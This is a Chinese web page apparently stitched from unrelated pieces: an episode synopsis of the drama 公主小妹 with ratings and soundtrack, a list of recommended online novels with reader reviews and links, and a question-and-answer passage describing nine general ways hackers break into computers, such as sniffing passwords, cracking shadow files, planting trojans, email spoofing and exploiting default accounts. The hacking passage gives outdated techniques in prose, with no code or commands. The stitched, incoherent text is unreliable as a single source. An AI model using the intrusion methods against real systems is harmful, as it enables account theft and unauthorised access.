皇甫雄对于孙女提出的要求乐观其成，但也有ㄧ项附带条件，那就是如果五年之内，小麦都没办法还清借款，就必须和皇甫雄的接班人瑾结婚。

小麦了解到皇甫雄的如意算盘，就是无论如何都希望小麦和自己的接班人结婚，小麦认定自己一定能在五年内还清房子的债务，因此爽快签约。

由于皇甫雄不希望小麦常单独去见麦父母，因此小麦拉瑾作陪，以取得爷爷信任，这也让瑾第一次有机会见到平凡家庭中的温暖，这也是瑾长久以来的心愿。

不过也由于小麦太常回去见麦父母，引起皇甫雄的反感，因此皇甫雄提供了麦父一个升迁的机会，但条件是要去巴西发展，这意味着麦父要与小麦彻底分开了，但是麦父想用这个机会来证明自己有能力可以带给小麦幸福，所以就算会有短暂的分离，麦父母还是咬紧牙根撑下去。

只是大家都不敢告诉小麦这个决定，把她蒙在鼓里，直到上飞机前的最后一刻，小麦得知后立刻冲出大门，途中遇到森川等人拦阻，但小麦哀求瑾载她到机场，瑾不忍心于是答应，只是最后还是没能见到他们临走前最后一面，小麦在极度难过之下决定离开皇甫家。

她独自一人孤独的回到麦父母家，面对冷冰冰空荡荡的房子，更显出自己的寂寞，瑾不忍心小麦的遭遇，于是想好心陪伴她，但是小麦随即又被皇甫雄抓回去，就算是瑾也没办法违逆皇甫雄的决定。

第三集

原本以为麦父是被爷爷逼走的小麦，在收到麦父给她的鼓励简讯后，才知道麦父是希望将来自己能更有能力更有资格来接小麦，所以才接受巴西的训练。

小麦因此解开了对爷爷的心结，不过另一方面也在想着该怎么样去偿还欠下爷爷的五百万债务，她积极的想在宅院中打工还钱，但爷爷技高一筹全数封杀了她的赚钱机会。

就在她正烦恼如何筹钱的时候，床上突然来了个天真无邪的不速之客—南风璘，表示自己非常喜欢小麦，并且拿着五百万的支票表示可以帮助小麦，只要小麦和自己共度一夜…

小麦对于夜半有陌生男子在自己床上感到惊讶，就算那人是南风爵之ㄧ的璘，这事还是非同小可…果然没多久就被Emp.得知，Emp.震怒之下让瑾搬到小麦房间隔壁，好彻底保护小麦，不过瑾知道这只是Emp.另一个借口，希望他们两个可以趁机更增进彼此距离。

但是小麦误会璘的大胆进入是有着瑾的默许，再加上先前瑾对小麦也态度不佳，因此小麦对瑾的误会越来越深…就在此时小麦无意中看见瑾藏着租屋数据，知道瑾想要离开皇甫家，瑾为了想封住小麦的口而显出少有的认真…

此时，南风爵中另一位南风彩出现，表示愿意给小麦五百万，只要她假意答应跟南风瑾订婚，一旦成功让喜怒不形于色的南风瑾跟Emp.大吵一架，就算任务成功。小麦原本不愿为了南风彩想看好戏的恶劣嗜好，而去作弄南风瑾，但想起傻里傻气的南风璘是在南风瑾的唆使之下，夜闯自己的房间，小麦一气之下，决定答应南风彩的要求，收下了二百五十万元的订金支票。

小麦因为要捉弄瑾而去告诉爷爷说自己喜欢瑾，爷爷一高兴之下就马上要让小两口订婚，Emp为了增加两人单独相处的机会，因此要求南风瑾要亲自训练小麦礼仪和舞蹈，以免小麦在订婚宴上出糗。

第四集

南风瑾虽然很不情愿要跟小麦订婚，但是为求在两个礼拜的期限内让小麦的状态可以上得了台面，还是拿出当年自己接受菁英课程的严苛态度训练小麦，小麦苦不堪言，更因为之前一连串的误会而认为南风瑾是在趁机修理自己。

另外，小麦在学校好不容易交到了朋友，但是瑾却警告这只是小麦单方面的美好认知而已，他要她认清一件事，就是皇甫家的人……没有朋友……，小麦虽然很不以为然，但是后来发现他们真的只是利用自己想更接近Emp.以谋得更大的利益时，这点让小麦难以接受，瑾才说出当年自己也被朋友背叛过，因此自己发誓一定要离开皇甫家才能过正常人的生活，这也让捉弄瑾的小麦显得有些不忍心…

随着相处的时间越久，小麦发现自己似乎越来越受南风瑾的吸引，甚至在不知不觉中爱上了他。小麦在和瑾单独外出时，突发奇想想去体验平民看房子的乐趣，也得知南风瑾希望能够离开皇甫家，独自出外打拚的心愿。小麦被南风瑾诉说梦想时的眼神所深深打动，却也明白一旦南风瑾和她订婚，他誓必一辈子都无法脱离皇甫集团这个沉重的负荷。订婚宴的日子一天天接近，小麦内心更是陷入天人交战的痛苦抉择中。

就在此时瑾利用帮小麦办欢迎会的机会，想撮合小麦和彩，用计让两人共枕眠，希望可以藉此逼迫小麦对Emp.提出取消婚约之事。

第五集

小麦对于瑾的作为虽然感到震惊，却又开不了口要求爷爷解除婚约。订婚宴前夕，Emp.帮小麦办了个正式的介绍会，除了告诉大家小麦的正式身分之外，也当众宣布了与瑾的婚事，这让小麦和瑾双方都备感压力。

瑾在席间巧遇了以前的朋友，更见证到金钱诱惑导致友情的改变，让目睹一切又心疼瑾的小麦更下定决心，要让瑾能够获得他想要的自由，于是小麦终于鼓起勇气告诉Emp.他不想嫁给瑾，瑾得知时有些震惊，他没想到当他自己知道不必订婚的消息时，心中竟然那么惆怅，瑾离开想独自想些心事，没想到却被Emp.误会是违背自己的命令离家出走，这让Emp.怒不可遏。小麦此时想到唯一可以引开Emp.注意力来帮助瑾的方式，就是以自己作饵…

小麦天真的认为目前唯一可以引开Emp.注意力来帮助瑾的方式，就是以自己作饵…她也来离家出走，让Emp.两头忙，就不会有空去找瑾了，这个鲁莽的举动果真让森川等人忙的焦头烂额。

瑾连络璘之后才知道自己被误会是离家出走，而且小麦为了维护自己也使出调虎离山之计，至今尚未找到两人踪影让大家十分焦虑。

瑾首先想到的是小麦家，于是偷偷跑去找，不料被当成小偷乱棒挥打，不过得知瑾特地来找自己时，小麦还是十分开心，正当两人忍不住想要有进一步的接触时，却被Emp.给逮个正着，Emp.看见两人关系发展良好乐观其成，不过就在此时，南风瑾意外得知小麦和南风彩的合约，以为小麦是为了钱才答应要跟自己结婚，这让瑾无法忍受…两人关系濒临崩解。

第六集

彩不想因为自己的失误导致小麦和瑾的分开，于是和Emp.密谋，希望引起瑾的妒意。但突然之间，璘却匆忙告诉小麦，瑾出车祸了，这让小麦十分惊吓……

小麦和璘赶到医院才发现，这一切都是璘设的局，用来确定小麦对瑾的感情到什么程度，结果璘了解小麦对瑾是真心的，因此想要撮合两人，但赶回家后却发现瑾竟然留书出走，让小麦受到打击。

另一方面，Emp.为了赌自己对于瑾的认知，因此和彩串通，假装让小麦转而和彩举行婚礼，想要趁机让瑾吃醋，进而露出喜欢小麦的马脚。但是随着等待的时间一分一秒的经过，瑾却毫无消息，就连彩都开始紧张起来了。

另外，瑾藉着这次出走才发现小麦在自己心中已经占了相当大的份量，无法忍受小麦嫁给别人，于是赶回家想要阻止婚礼的进行，一进门发现人去楼空，还以为自己错过了婚礼正感到气馁，才发现是Emp.取消了婚礼，这才高兴的与小麦相会，两人也才正视双方对彼此的感情。

一滴水滴由天而降，掉在瑾特地为小麦准备的甜品上。“不会吧？不会那么巧，这时候下雨……”忽然雷声乍响，大雨瞬间倾盆而下，小麦和瑾完全不理会打在身上的绵密雨丝，继续他们第一次的约会……

第七集

两人虽然已经彼此互相承认喜欢对方，但是还是要避免被Emp.发现，以免瑾成为顺理成章的接班人，Emp.甚至还发出十万奖金的悬赏，希望有人能拍到两人的亲密合照，因此两人费尽心思的逃开Emp.的监视。最后小麦想到一招，在女装更衣室，运用地利之便让自己和瑾能够暂时避开众人眼光，短暂独处。

Emp.知道这波攻势无法逼他们承认相恋事实，因此暗中秘密进行着更加劲爆的终极计划……

而正当瑾和小麦还在苦苦寻找避开Emp.眼线的相处方式时，突如其来的晴天霹雳从天而降！

“经由DNA的检验，宫小姐已证实是Emp。的亲生孙女……”知道错认小麦的身分后，皇甫雄决定将小麦送回麦氏夫妇身边。小麦终于可以离开皇甫家了，但是内心的伤痛却抽干她所有的力气，如果她不是皇甫珊，不是麦秋穗，那她是谁呢？

第八集

正当瑾和小麦还在苦苦寻找避开Emp.眼线的相处方式时，突如其来的晴天霹雳从天而降！Emp.竟然表示小麦并不是他的亲生孙女，那是个天大的误会！真正的皇甫珊乃是一位最近刚转到小麦班上的宫茉莉。

大家都为此感到震惊，小麦更是大受打击，除了不知道亲生父母的下落之外，也对已产生感情的皇甫家觉得不舍，不过影响最大的还是Emp.希望瑾能够和宫茉莉成亲，虽然瑾单方面安慰着小麦，表示自己绝不会跟宫茉莉结婚，但是小麦了解以Emp.强势的作风，命令难违！

小麦不愿将瑾拱手让给宫茉莉，于是求Emp.让自己留下来帮佣，瑾虽不舍小麦面临的处境，但这样至少能够每天见面，而Emp.也觉得小麦的经验可以协助茉莉尽快适应皇甫家的环境，于是让小麦成为茉莉的贴身女佣，然而宫茉莉却对小麦极尽刁难

第九集

成为佣人的小麦，虽然饱受茉莉刁难，但依旧非常坚持要待在皇甫家，为的也就是想要跟瑾继续在一起。但是茉莉对瑾的企图心越来越明显，令小麦非常担心，就在小麦想要查探茉莉是否有趁机纠缠瑾时，两人在口角争斗中，小麦意外发现茉莉的身上并无心型胎记，小麦因此认定茉莉非Emp.的亲生孙女。茉莉被识破后，也大方表示自己的确不是皇甫雄的亲孙女，她只是为了要得到瑾才假冒身分，小麦因此非常愤怒，想找Emp.解释，没想到Emp.却不愿意相信自己，小麦在苦无证据下，无法揭发茉莉的阴谋，不甘心又好强的小麦于是想靠一己之力，不凭借其它人的帮助来揪出茉莉的狐狸尾巴。

但是小麦的三番两次查探都被茉莉挡掉，甚至落得最后以冒犯主人而被迫关紧闭，但小麦依旧不愿放弃.

而一次，小麦在Emp.打扫，竟意外听见茉莉与Emp.的密谋，原来茉莉是Emp.故意找来冒充，还要茉莉假装想抢瑾，目的就是要迫使瑾跟小麦愿意承认彼此是相爱的，而听到这一切阴谋的小麦，决定要以牙还牙。

翌日，小麦便假装辞去工作并决定回巴西，果然吓得Emp.等人前来劝阻，就在小麦假意祝福瑾跟茉莉，并表示自己跟瑾没什么，希望能让茉莉或Emp.讲出实话的时候，没想到却让瑾听见了一切，瑾似乎因此误会了小麦是要离开他，瑾甚至负气表示愿意娶茉莉，更吓到了众人。

小麦追着瑾想要解释，没想到瑾却不愿意听，但其实瑾似乎另有想法，他也想用自己的方式揭开所有的阴谋。

果然隔天之后，瑾就故意与茉莉交好，甚至想约茉莉前往别墅度假，害怕两人真的发生感情的Emp.于是指派了彩跟小麦也一起去。小麦眼见瑾频频接近茉莉，甚至不愿意听自己解释，这似乎已经超过了不谅解，甚至怀疑瑾也许爱上了茉莉，但即便如此，小麦依旧不愿放弃瑾……

第十集

在前往度假的路程，小麦依旧频频找机会要跟瑾重修旧好，一方面还要对付眼中钉-宫茉莉，在茉莉的激怒下，两人斗嘴打闹搞得天翻地覆的。但所有的一切，最后却止于瑾在晚餐后的话……瑾向众人表示，他为了想要跟茉莉培养感情，希望能跟茉莉共度良宵，甚至把小麦推给了彩，此言一出，连一向表示自己非常喜欢瑾的茉莉都吓呆了，因为其实茉莉的心里早已另有所属，小麦也在愤怒之下答应了与彩同一间房。诡谲多变的夜晚即将展开！

小麦虽然与彩同一间房，心里却牵挂着茉莉跟瑾的情况，而茉莉那头，这时候出乎小麦意料，茉莉也在担忧接下来的夜晚到底会发生什么事，因而十分防着瑾的一举一动，殊不知这一切都在瑾的算计、掌控之中……

果然，按耐不住的小麦趁夜来找瑾，企图向瑾表示自己依旧不变的感情，却遭到瑾的冷漠对待，彩因而护着小麦，没想到却意外惹来茉莉的震撼表白！原来，茉莉真正喜欢的人居然是彩，而且还暗恋了十年，而这计划的目的，只是为了能名正言顺的接近彩。

终于真相大白，彩最后也在又惊又感动的情绪下，考虑与茉莉交往看看。而小麦与瑾也决定向Emp.坦承自己的决定，最后瑾跟彩双双坚决的向Emp.表示自己无意成为接班人，而小麦、茉莉也力挺到底，Emp.因而被逼着使出最后的绝招！

第十一集

Emp.因而被逼着使出最后一招，将四人逐出皇甫家，如瑾所愿，让他白手起家，另一方面，Emp.更命令森川全面封锁一切经济与资源，因而导致四人在外找工作处处碰壁。

最后在小米的帮助下，小麦与其他三人搬到小麦原本的旧家，而找不到工作的瑾最后找到工地的搬运工，却让小麦非常心疼瑾这样受苦，但瑾的坚持与努力感动了小麦，两人在患难中感情更加精进……

第十二集

在经过一段日子后，小麦化身为小气贤妻，天天照顾大家饮食并控制预算，瑾则是在工地日也操、夜也操，彩跟茉莉虽然不再有朋友可靠，彩倒是靠着典当行头，也能开心度过，Emp.眼见如此，更加不舍小麦跟瑾在外受苦，所以决定各个击破。

森川于是找上茉莉与彩，并循循善诱，两人虽然极少在小麦与瑾面前抱怨，但其实内心都不太适应在外吃苦的生活，于是彩被说服，并劝瑾也一起回去，不要再与Emp.斗气。瑾却反而质问起彩，为何人云亦云，到底还要这样漫无目的虚度人生多久？彩因而与瑾引发激烈冲突。但彩心里也明白，瑾所说的话也没错，在茉莉的爱情支持下，彩决定回到皇甫家洗心革面、从头努力，彩也力劝Emp.放过小麦跟瑾，但Emp.依旧坚持.....

另一方面，小麦跟瑾的两人生活似乎越来越顺利，瑾也在一家小公司找到工作，准备开始展开新的生活，而终于熬出头的两个人，也越来越懂得如何去珍惜这种贫穷中还有彼此的幸福。

但老天似乎不让两人好过，这时Emp.突然病危，Emp.陷入昏迷前，决定要将皇甫企业交由董事会控管以成全瑾跟小麦，但众人都明白Emp.一生的努力都在皇甫企业，没人愿意让Emp.的心血白费，瑾与小麦商议，决定放弃现在的生活回来当接班人，但没想到小麦却坚决不同意，认为瑾应该忠于自己的心，并表示她才应该代替Emp.努力成为接班人。

第十三集(大结局)

小麦想努力成为接班人，这个有点令人惊讶的决定，最后却得到众人的支持，大家努力帮小麦恶补，希望她能通过董事会的接班人考核，但正式上场的时刻，小麦却表现得零零落落，就在董事会即将作出否决时， Emp. 却奇迹式的清醒，并推荐小麦成为自己的接班人，董事会也因而同意，但条件是小麦必须前往国外受训 3 年。望着瑾，还有 Emp. ，爱情与亲情的煎熬，小麦最后还是点头同意出国进修。

在小麦出发日的机场内，众人包括已经康复的 Emp. 都在等着迟迟未来的瑾，原来瑾正在签订他人生中的第一项业务合约，在小麦决定让瑾以工作为主，决定先行离开的时候，瑾出现了，并送上了他的第一份合作契约影印本给小麦，这也代表着他对小麦的承诺，他会等着小麦回来，在那天之前，为了不输给在外国努力的小麦，他也会跟小麦一样的努力。

两人在机场紧紧拥吻着…却不悲伤，因为，他们两个都知道他们的故事并没有这样就结束了，他们的未来，爱还会持续着，直到永远…

！

【收视率】

公主小妹1 (中视) NEW 3.3

公主小妹2 (中视) 3.72

公主小妹3 (中视) 3.13

公主小妹4 (中视) 3.28

公主小妹5 (中视) 3.21

公主小妹6 (中视) 3.24

公主小妹7 (中视) 3.31

公主小妹8 (中视) 3.56

公主小妹9 (中视) 3.81

公主小妹10 (中视) 3.51

公主小妹11 (中视) 3.45

公主小妹12 (中视) 3.15

公主小妹13 (中视) 3.55

整剧平均收视率：3.40

【电视原声带】

1 新窝 飞轮海 S.H.E (主题曲)

2 不想懂得 张韶涵 (片尾曲)

3 能不能勇敢说爱 张韶涵 (插曲)

4 我恋爱了 张韶涵 (插曲)

5 乐园 张韶涵 (插曲)

6.over the rainbow 张韶涵(插曲)

【影视歌曲】

1、《新窝》

2、《不想懂得》

3、《能不能勇敢说爱》

4、《我恋爱了》

6.over the rainbow

5、《乐园》

书荒··求好看的YY都市小说（家世nb，人物nb），大学校园

都市类：

禁果 推荐！ （看名字别以为是H小说，其实是点H都没多写，好看） 《禁果》作者：幸运十三号

都市神人 推荐！ （我看得蛮爽D ，不知道不怎么评价）《都市神人》作者：游心浪子

黑客类：

原始动力 推荐！ （不会说 就是好看就行了） 《原始动力》 （全）作者：出水小葱水上飘

地狱黑客 推荐！ （看得会笑的小说，好看精彩）《地狱黑客》全集 作者:会飞的

修真类：

飘邈之旅 推荐！ （修真小说的开山祖师。不得不看）飘邈神之旅

诛仙（被人们狂推的小说，也可以看下）

推荐！ （另类极品好看。。。。。的飞刀修真）《寸芒》作者 我吃西红柿 TXT全本下载

升龙道 (现代都市修真，血红著，挺不错） 《升龙道》 作者：血红 TXT下载

异界类：

纨绔子弟 推荐！ （经典中的经典，好看到无法形容）《纨绔子弟》（完结）作者：郝歪

仙魔霸业 推荐！ （不只是普通的异界小说哦）《仙魔霸业》 作者：槐林

自由梦幻 推荐！ （主角因为被背叛，转世异界）

重生之绝色风流 推荐！ （先当采花贼，后来去当皇帝）《重生之绝色风流》作者:大种马

网游类：

猛龙过江 推荐！ 蜀山 推荐！ （ 套用老话：猛龙过江，武林至尊，蜀山不出，谁与争锋）

《猛龙过江》作者：骷髅精灵（完）

比较差类：

驭兽斋 推荐！ （主角整天做救世主。。。。）《驭兽斋全集》 作者：雨魔 TXT格式下载

极道修行录 推荐！ （去魔法世界打架旅游 ）《极道修行录》作者：默幽 (全本)

魔法学徒 （笨蛋被逼成大人物的故事）

我是大法师（吃地瓜多了，会成如神王一般的存在哦）

大圣者（无敌的主角，种马+YY）http://www.wxsky.net/bookfiles/774.htm

浪子魔侠传奇 推荐！ （主角开始不强，最后强到BT，）http://www.wxsky.net/bookfiles/1207.htm

梦回九七 推荐！ （经典的回到过去，抄袭了N多的注著名小说）http://www.wxsky.net/bookfiles/353.htm

无极之旅 （在游戏里面修真，挺好）http://read.xwdl.com/modules/article/reader.php?aid=11313

创世修罗传 （主角简直是 死人BT中的BT中的。。。BT）

创世追忆录 推荐！ （主角离开地球，发现。。。。）

时空创神帝 （主角一开始便是无敌的创始神。挺不错的）。

另外付赠一篇 书评加简介，很合亲的胃口~~~ ^^

1.书名：《欲望中的城市》 作者：跳舞 类型：都市yy

简介：

一个普通的城市里的年轻人陈阳，身边的奇怪的事情一件接一件发生，三个美女先后出现在身边，然后又从一无所有到白手起家成为一个传奇人物的故事！

我侃：

跳舞，有名吧？写的书基本都是火的不能再火，火为什么？写的好贝。本书从文笔到情节都是少见的经典，长度也适中，拿起来就放不下，我最喜欢书中人物的对话，略带调侃的语气，用幽默通俗的话，表达作者对社会人事物的感悟，hoho大笑中思考，而且不会太沉重，生活就不易了，看书不就是个消遣嘛？看的哭天骂地的，那还是算了吧，哈哈一笑多痛快。

2.书名：《嬉皮笑脸》 作者：跳舞 类型：都市yy

简介：

一个无所事事的年轻人，与朋友，与恋人，以及生活中的一些琐碎事纠缠的故事。

我侃：

情真意切，非常感人，在平淡的叙述之间，流淌着一种现实的酸涩。说实话有的地方有点不爽，不过结尾是好的，人物的对话依然经典，就是太短了。好多人说这是跳舞写的最好的一篇文（还好~），可能就是因为短，写起来好把握，一口气读完，久久回味。

3.书名：《邪气凛然》 作者：跳舞 类型：都市yy

简介：

一个父母早亡的学过武术的孤儿，从夜总会端盘子开始，一步步的往上爬，从被老板赏识成为经理到被最信任的人出卖远走加拿大，最后羽翼丰满时，回到国内，报仇血耻。

我侃：

跳舞写的都市作品真是太强了，看上就放不下。这书稍微有点大，感觉上有点臃肿，其实拆开细看都是相当好看的，可拼在一起就有点散，感觉上就像好多经典的内容拼到一起，估计是连载太长时间的缘故吧，不过这么说也是相对完美来讲的，这书绝对是不能不看的好书。

4.书名：《重生传奇》 作者：紫箫 类型：都市yy

简介：

新婚之夜，新郎死于洞房之外，一个意外让他轮回转世，重又降生回1980年……

我侃：

这书我完整的看过3遍，爽死。主角重生后通过前世的记忆，从小就开始培养自己的能力包括身体知识等，享受童年快乐的同时发展自己的事业，书里写的90年代初，小学的一些趣事和那时小孩爱吃的零食，我深有感触，太经典的回忆了，还有美女那是不能少，而且也是从小培养的，嘎嘎，太邪恶了（其实很纯洁的），中间有段“小象”的故事，哇哈哈，笑到我吐血！没看过的赶紧去看看吧，尤其是8、9十年代出生的人，那段零食的详细描写就能爽死。

5.书名：《女子律师楼》 作者：心在流浪 类型：都市异能

简介：一间全部由青春靓丽的女孩子组成的律师楼，某一天，多了一个男人……

我侃：

禀承心在流浪温柔小种马的一贯作风，轻轻松松中男与女产生出微妙的情感（女主一般不是太聪明，太聪明了就不好轻松了），这篇我觉得是他把种马程度保持的相当好的一本书，女的不是太多（相对与他的其他书），异能也写的相当好看。

6.书名：《艳遇谅解备忘录》 作者：撒冷 类型：都市异能

简介：

楚天齐，一个平凡得不能再平凡的年轻人。他的生命轨迹仿佛就是为了证明一个事实，每一个人都有着自身伟大的价值，只要给一个机会，任何一个平凡人都可以变得不平凡。

police，律师，医生，巨星，高中生，大学讲师，间谍，校花，主播，超级富豪；一枚青龙戒让楚天齐周旋在这形形色色的女人之中，他改变了她们的命运，而她们也改变了他的命运。无数的风流帐，让楚天齐背上了一个显赫的绰号——“夜晚的君王”。然而这个夜晚的君王却一点也不承认自己是一个种马。

而身为作者的在下，也坚决抗议称这本书为种马。因为这本书最重要的，是写一个普通人如何成长，而不是简单的四处征服美女。

我侃：

撒冷，不用多说，也是一超级强人。风格有点类似于跳舞，都属于有思想，有文化，能说会道，搞笑吐血型的写手。当然语言风格和人物刻画还是风格明显的，绝对是和跳舞一个级别的人物。《艳遇谅解备忘录》这个书我也是看了3遍，里面的经典对话太多了，笑死能，里面有一封情书，看过的人绝对有印象，我觉得那就不是人写的，那么酸，那么痒，那么挠人情书，我靠，浑身起鸡皮疙瘩的同时，倒地吐血，然后佩服的五体投地。

7.书名：《YY之王三部曲之传媒帝国》 作者：撒冷 类型：都市yy

简介：

他的名字叫做唐风，一个只按照自己想法生活的人。因为一个朋友的关系，他懒洋洋地踏入了生意圈，以广告营销崭露头角。在财富的浪潮中，无数的人被淹没，而他却能够始终保持超然的态度。然而超然之中又有茫然，一直到他遇到他命中最重要的一个人之后，他才真正找到了方向——他要建立一个传媒帝国。

从报纸，杂志，到漫画，动画，电视剧，电影，到偶像炮制，模型生产，文化周边产品。

“我要整个世界的表情随着我的心情而改变。”唐风语。

我侃：

调侃的语气，经典的对话，又一部好书。懒洋洋的主角，出口就让大姑娘小媳妇们脸红心跳，生气的同时又有点欢喜（我靠，我怎么说出这么o心的话），总之主角我相当喜欢，太有性格了，别管是商业还是美女，一出手就惊天地，泣鬼神。

8.书名：《无敌幸运星》 作者：开玩笑 类型：都市神鬼修真

简介：

一个从出生以后就运气糟糕到极点的即将大学毕业的主角，在拨电话求职的时候，突然听到了电话那头一个美妙的女声：喂，您好，这里是运气管理中心……

本人的设定中，本书为后宫文。不少读者问起后宫文与种马文的区别，本人特此说明下本人自己的见解：后宫文强调与女角色之间心灵的交融，种马文强调与女角色之间肉体的交融……

我侃：

忘了谁说的：快乐是建立在别人的痛苦之上。我不太清楚，反正看着主角倒霉我能笑死，也不知道作者怎么想的，各种匪夷所思的倒霉法都降临在了主角身上，再加上几个个性美女的围绕，以及运气管理中心里的两个仙女瞎折腾，主角痛苦并快乐着。（仙女最后也没跑了，被主角拿下。）

9.书名：《春光乍泄》 作者：天堂羽 类型：都市异能

简介：一个没有学历专长的孤儿浪子

“预”见绝世美女之后

凭著良好的心态、生活职场智慧

开始自己的进取之旅

他拥有可以梦中预测的异能

让他无往不利

美女、成功、……

◎◎◎◎◎◎◎◎◎◎◎

意乱情迷极易流逝，

难耐这夜春光浪费，

难道你可遮掩着身体、分享一切？

愈是期待愈是美丽，

来让这夜春光代替，

难道要等青春全枯萎至得到一切？

我侃：

前两章感觉挺恶俗的，后来越看越好，越看越好，然后就看完了。感情戏写的相当不错，内容流畅，看着特爽。男主角也挺很，几个女主角大撞车后狂扁了男主一顿，男主一气之下远走西藏半年，几个女主当时傻眼。

10.书名：《我是皇帝我怕谁》 作者：拈花邪少 类型：穿越 玄幻 武侠

简介：

当一天和尚撞一天钟，当一天皇帝就睡一天后宫。

我无缘无故地被女朋友甩了，又无缘无故地捡到一笔银行劫案的脏款，无缘无故地被一位漂亮又野蛮的见习女警追杀，又无缘无故地一起滚回了古代，无缘无故地卷入了仇杀，稀里糊涂地当上了山贼，再无缘无故地变成了明朝的正德皇帝……

太多的无缘无故让我得出了一个结论：这是命运的安排！

噢不！其实我知道是作者安排的一切情节。只不过他给我安排了许多美女作伴，我也就乐得做这个主角，任其摆布。只不过我有一个强烈要求，那就是H描写需要再加强！反正都是YY，就应该YY的更过瘾！嘿嘿！

在此我要代表所有YY小说的男主角提出一个真知灼见:“YY才是硬道理！”

拈花邪少气急败坏加义正词严地悲呼道：“YY是必须的，更新才是硬道理！” .........................................................................

申明：本书纯属一部快餐小说，以娱乐为主，不追求太多的思想性。所以我用心写，你随意看！有钱的捧个钱场，没钱的捧个人场。谢谢合作！

我侃：

穿越中的王者！（不算言情），我觉得作者超会恶搞，他是皇帝，和他一块穿越的那个女police变成了秋香，收了4个锦衣卫非把人改名成刘德华，张学友·····好多好多内容。恶搞我也看过不少，恶搞过了招人骂，轻了没味道，这书的作者尺度把握的比较好，用现代的眼光诠释古代情节，但又不脱离古代的氛围。

11.书名：《魔脑传奇》 作者：皓月星灯 类型：都市 异能 军事

简介：

一个罪恶的试验，一个不是意外的意外，一个医学上已经死亡的男孩，造就了一个奇迹的诞生……

将深刻的痛苦掩埋，他踏上了自强之路，面对爱情的选择题他难以取舍，面对民族大义，他毫不犹豫。

他本是一个普通人，平凡却与他 无缘，越来越多的人团结在他周围，创下了一个又一个的奇迹，他以商业筹资、农业立本、工业科技强国，以现代化的精锐部队慑服海内外，让中华古国重新站在世界最强之列。

阴暗处波云诡秘，几度生死关头，他越来越强大，站在人生的颠峰，他该何去何从……

这是一个YY幻想故事，这是一个人，一个国家，一个民族的传奇，有欢笑也有泪水，新的历史从他脚下开始……

黑客是怎样通过网络入侵电脑的啊？

黑客是入侵别人电脑的方法有9种。

1、获取口令

这又有三种方法：

一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的Shadow文件。

此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。

2、放置特洛伊木马程序

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。

当您连接到因特网上时，这个程序就会通知黑客，来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

4、电子邮件攻击

电子邮件攻击主要表现为两种方式：

一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；

二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

5、通过一个节点来攻击其他节点

黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如IP欺骗，因此较少被黑客使用。

6、网络监听

网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

7、寻找系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

8、利用帐号进行攻击

有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。

9、偷取特权

利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。

